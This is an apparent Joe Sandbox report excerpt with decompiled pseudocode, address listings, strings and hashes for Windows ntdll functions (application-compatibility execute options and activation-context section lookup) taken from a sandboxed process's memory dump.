						E34EDEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E34E98F40( &_v548, 0, 0x214);
						_t106 =  *0x34f46664;
						_t110 = _t108 + 0x20;
						 *0x34f491e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x34f46664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E34E94C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E34EDEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E34E9A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E34EDEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E34E9A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E34EDEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E34ECCC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E34EDEF10();
						goto L15;
					}
					L8:
					_t56 = E34E87648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x34e87560
0x34e87562
0x34e8756f
0x34e87571
0x34e875ab
0x34e875b9
0x34e875b9
0x34e87579
0x34e87583
0x34e8758f
0x34ec4443
0x34e87595
0x34e8759e
0x34e8759e
0x34e875a2
0x34e875bc
0x34e875c2
0x34e875c7
0x34e875c9
0x34e87621
0x34e87623
0x34e87624
0x34e875f8
0x34e875ff
0x34e87601
0x34e8762c
0x34e87603
0x34e87609
0x34e87610
0x34e87612
0x34e87612
0x34e87612
0x34e87614
0x34e87616
0x34e87630
0x34e87633
0x34e87633
0x34e87618
0x34e8761a
0x34ec45c9
0x34ec45c9
0x34ec45d1
0x34ec45d2
0x34ec45d4
0x34ec45d6
0x34ec45d6
0x00000000
0x34e8761a
0x34e875ce
0x34e875d4
0x34e875da
0x34e875df
0x34e875e1
0x34ec444a
0x34ec4450
0x00000000
0x00000000
0x34ec4456
0x34ec4469
0x34ec4476
0x34ec4486
0x34ec448b
0x34ec4497
0x34ec44b9
0x34ec44bf
0x34ec44c1
0x34ec44c3
0x00000000
0x00000000
0x34ec44c9
0x34ec44cf
0x34ec44d1
0x00000000
0x00000000
0x34ec44dc
0x34ec44de
0x00000000
0x00000000
0x34ec44e6
0x34ec44ed
0x34ec44ef
0x34ec45c4
0x00000000
0x34ec45c4
0x34ec44f7
0x34ec44f8
0x34ec4510
0x34ec4515
0x34ec4524
0x34ec452b
0x34ec452c
0x34ec452e
0x34ec4556
0x34ec4561
0x34ec4567
0x34ec4569
0x34ec456c
0x34ec456e
0x34ec4574
0x34ec4576
0x00000000
0x00000000
0x00000000
0x00000000
0x34ec457c
0x34ec457c
0x34ec4584
0x34ec4588
0x34ec458a
0x34ec458c
0x34ec458e
0x34ec458e
0x34ec459b
0x34ec45a0
0x34ec45a7
0x34ec45ac
0x34ec45ae
0x00000000
0x00000000
0x34ec45b4
0x34ec45b4
0x34ec45b7
0x34ec45b7
0x00000000
0x34ec45bf
0x34ec4530
0x34ec4535
0x34ec4537
0x34ec4539
0x00000000
0x34ec453e
0x34e875e7
0x34e875e9
0x34e875ee
0x34e875f0
0x00000000
0x00000000
0x34e875f2
0x00000000
0x34e875a4
0x34e875a4
0x34e875a4
0x00000000
0x34e875a4

Strings

Execute=1, xrefs: 34EC451E
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34EC4530
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34EC4460
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 34EC4507
ExecuteOptions, xrefs: 34EC44AB
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 34EC454D
CLIENT(ntdll): Processing section info %ws..., xrefs: 34EC4592

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: e9d4873ef2c66bb9e96dc2a93f570b90702e75beba742e0db9185fca8a371854
Instruction ID: c8082417ca83fe927214a23aaea0ce25735622cff380d008165b44033d48af10
Opcode Fuzzy Hash: e9d4873ef2c66bb9e96dc2a93f570b90702e75beba742e0db9185fca8a371854
Instruction Fuzzy Hash: 2E51E876A10329BEFF159BA4DC85FA973A8EF08744F4408EDE509A7180EB309E45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 34E6A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E34E6A170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E34E6A600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E34E6A760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x34f491e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E34E54428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E34E6A600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					E34EDEF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												E34EDEF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}

0x34e6a178
0x34e6a17f
0x34e6a182
0x34e6a18f
0x34e6a4b4
0x00000000
0x34eb77ce
0x34eb77ce
0x00000000
0x34eb77ce
0x34e6a195
0x34e6a195
0x34e6a199
0x34e6a1a1
0x34e6a1a9
0x34e6a1b1
0x34eb77f3
0x34eb77f3
0x00000000
0x34e6a1b7
0x34e6a1b7
0x34e6a1c0
0x00000000
0x34e6a1c6
0x34e6a1c6
0x34e6a1cc
0x34e6a5dc
0x00000000
0x34e6a5e2
0x00000000
0x34e6a5e2
0x34e6a1d2
0x34e6a1d4
0x00000000
0x34e6a1da
0x34e6a1da
0x34e6a1dd
0x00000000
0x34e6a1e3
0x34e6a1e3
0x34e6a1e6
0x34e6a1fa
0x34e6a1fd
0x34e6a5f0
0x00000000
0x34e6a5f6
0x34eb77fd
0x34eb7802
0x34eb7807
0x00000000
0x34eb7807
0x34e6a203
0x34e6a203
0x34e6a208
0x34e6a20b
0x34e6a20f
0x34e6a216
0x34e6a21c
0x34e6a224
0x34e6a228
0x34e6a22b
0x34e6a233
0x34e6a23b
0x34e6a23f
0x34e6a243
0x34e6a247
0x34e6a250
0x34e6a252
0x34e6a255
0x00000000
0x00000000
0x34e6a25b
0x34e6a263
0x34e6a26f
0x34e6a26f
0x34e6a277
0x34e6a27d
0x34e6a3ae
0x34e6a3ae
0x34e6a3b4
0x34e6a3be
0x34eb7823
0x34eb7826
0x00000000
0x34eb782c
0x34eb782c
0x00000000
0x34eb782c
0x34e6a3c4
0x34e6a3c4
0x34e6a3c9
0x00000000
0x34e6a3c9
0x34e6a283
0x34e6a283
0x34e6a288
0x00000000
0x34e6a288
0x34e6a265
0x34e6a265
0x34e6a269
0x34e6a4bf
0x34e6a4c2
0x34e6a4c8
0x34e6a4e3
0x34eb780e
0x00000000
0x34e6a4e9
0x34e6a4ec
0x34eb7819
0x00000000
0x34e6a4f2
0x34e6a4f2
0x00000000
0x34e6a4f2
0x34e6a4ec
0x34e6a4ca
0x34e6a4ca
0x34e6a4cc
0x00000000
0x34e6a4d2
0x34e6a4d2
0x34e6a4d2
0x34e6a4d7
0x34e6a28c
0x34e6a28e
0x34eb7833
0x34eb7838
0x34eb7838
0x00000000
0x34e6a294
0x34e6a2a5
0x34e6a2ac
0x34e6a3d2
0x34e6a3d9
0x00000000
0x34e6a3e8
0x34e6a3e8
0x34e6a3ec
0x34e6a3f0
0x00000000
0x34e6a3f0
0x34e6a2b2
0x34e6a2b2
0x34e6a2d2
0x34e6a2d6
0x34e6a2d8
0x34e6a2da
0x34e6a2dc
0x34e6a2de
0x34eb783a
0x34eb783c
0x00000000
0x34eb7842
0x00000000
0x34eb7842
0x34e6a2e4
0x34e6a2e4
0x34e6a2e4
0x34e6a2eb
0x34eb78ed
0x34eb78ed
0x00000000
0x34e6a2f1
0x34e6a2f1
0x34e6a300
0x34e6a300
0x34e6a300
0x34e6a30a
0x00000000
0x00000000
0x34e6a310
0x34e6a325
0x34e6a32c
0x34e6a4f7
0x34e6a500
0x34e6a502
0x34e6a505
0x34e6a50b
0x34e6a5a5
0x34e6a5b8
0x34e6a5be
0x34e6a5c2
0x34e6a5cb
0x34e6a5d1
0x34e6a5d1
0x34e6a5cb
0x34e6a50b
0x34e6a523
0x34e6a549
0x34e6a551
0x34e6a525
0x34e6a53c
0x34e6a543
0x00000000
0x00000000
0x00000000
0x00000000
0x34e6a543
0x34e6a332
0x34e6a337
0x34e6a393
0x34e6a399
0x34e6a339
0x34e6a339
0x34e6a342
0x34e6a344
0x34e6a34a
0x34e6a34e
0x34e6a355
0x34e6a359
0x00000000
0x34e6a360
0x34e6a363
0x34e6a3fa
0x34e6a3fc
0x34eb7847
0x34eb784f
0x00000000
0x34eb7855
0x34eb7855
0x34eb7859
0x00000000
0x34eb785f
0x34eb785f
0x34eb7862
0x34eb7868
0x34eb7892
0x34eb7894
0x00000000
0x00000000
0x00000000
0x00000000
0x34eb786a
0x34eb786d
0x34eb787e
0x34eb788b
0x00000000
0x34eb7880
0x34eb7880
0x34eb7885
0x34eb789a
0x34eb789a
0x34eb789f
0x00000000
0x34eb789f
0x34eb786f
0x34eb7873
0x34eb788e
0x34eb788e
0x00000000
0x34eb788e
0x34eb786d
0x34eb7868
0x34eb7859
0x34e6a402
0x34e6a402
0x34e6a405
0x34e6a554
0x34e6a556
0x34e6a55e
0x34e6a564
0x34e6a56a
0x00000000
0x34e6a570
0x34e6a570
0x34e6a575
0x00000000
0x34e6a575
0x34e6a40b
0x34e6a40e
0x00000000
0x34e6a414
0x34e6a414
0x34e6a418
0x34e6a420
0x34e6a426
0x34e6a42c
0x00000000
0x34e6a432
0x34e6a432
0x34e6a437
0x00000000
0x34e6a437
0x34e6a42c
0x34e6a40e
0x34e6a405
0x34e6a369
0x34e6a369
0x34e6a36c
0x34eb78e3
0x00000000
0x34e6a372
0x34e6a372
0x34e6a374
0x34e6a452
0x34e6a459
0x34e6a57e
0x34e6a585
0x00000000
0x34e6a594
0x34e6a594
0x34e6a598
0x00000000
0x34e6a598
0x34e6a45f
0x34e6a45f
0x34e6a47f
0x34e6a483
0x34e6a485
0x34e6a487
0x34e6a489
0x34e6a48b
0x00000000
0x34e6a491
0x34e6a493
0x34eb78a8
0x34eb78b1
0x34eb78c3
0x34eb78c3
0x34eb78cb
0x00000000
0x00000000
0x34eb78d6
0x34eb78dc
0x00000000
0x34eb78de
0x00000000
0x34eb78de
0x00000000
0x34eb78dc
0x34eb78c3
0x34eb78b1
0x34e6a499
0x34e6a499
0x00000000
0x34e6a499
0x34e6a48b
0x34e6a37a
0x34e6a37a
0x34e6a37f
0x34e6a381
0x34e6a49b
0x34e6a49b
0x34e6a4a2
0x00000000
0x34e6a4a8
0x00000000
0x34e6a4a8
0x34e6a387
0x34e6a387
0x34e6a38c
0x34e6a38e
0x34e6a38e
0x00000000
0x34e6a38c
0x34e6a381
0x34e6a374
0x34e6a36c
0x00000000
0x34e6a363
0x34e6a360
0x34e6a337
0x00000000
0x34e6a32c
0x34eb78f1
0x34eb78f1
0x34eb78fc
0x34eb7904
0x00000000
0x34eb7904
0x34e6a2eb
0x34e6a2de
0x34e6a2ac
0x34e6a28e
0x34e6a4cc
0x00000000
0x00000000
0x00000000
0x34e6a269
0x00000000
0x34e6a39c
0x34e6a39c
0x34e6a39f
0x00000000
0x34e6a3a5
0x34e6a3a8
0x00000000
0x00000000
0x00000000
0x00000000
0x34e6a3a8
0x00000000
0x34e6a39f
0x34e6a250
0x34e6a1e8
0x34e6a1f1
0x34eb77d8
0x34eb77dd
0x34eb77e2
0x34eb77e7
0x34eb77e7
0x34eb77e9
0x34eb77eb
0x00000000
0x34e6a1f7
0x34e6a1f7
0x00000000
0x34e6a1f7
0x34e6a1f1
0x34e6a1e6
0x34e6a1dd
0x34e6a1d4
0x34e6a1cc
0x34e6a1c0
0x34e6a1b1
0x00000000

Strings

RtlpFindActivationContextSection_CheckParameters, xrefs: 34EB77DD, 34EB7802
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 34EB78F3
Actx , xrefs: 34EB7819, 34EB7880
SsHd, xrefs: 34E6A304
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34EB77E2
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34EB7807

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 302e3569ade40cb430b230f3303ad535c222d2e5700f670b4405b100a7a694c0
Instruction ID: 4555c986c611154105e6a4ccd7cd5faac318b3b71d4ba07e156e882be670666c
Opcode Fuzzy Hash: 302e3569ade40cb430b230f3303ad535c222d2e5700f670b4405b100a7a694c0
Instruction Fuzzy Hash: 52E1B174B483018FE715CF28C88072AB7E5FB8636CF504A2DE8A68B690D739D845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 34E6D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E34E6D690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x34f4b370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return L34E94B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							E34EDEF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
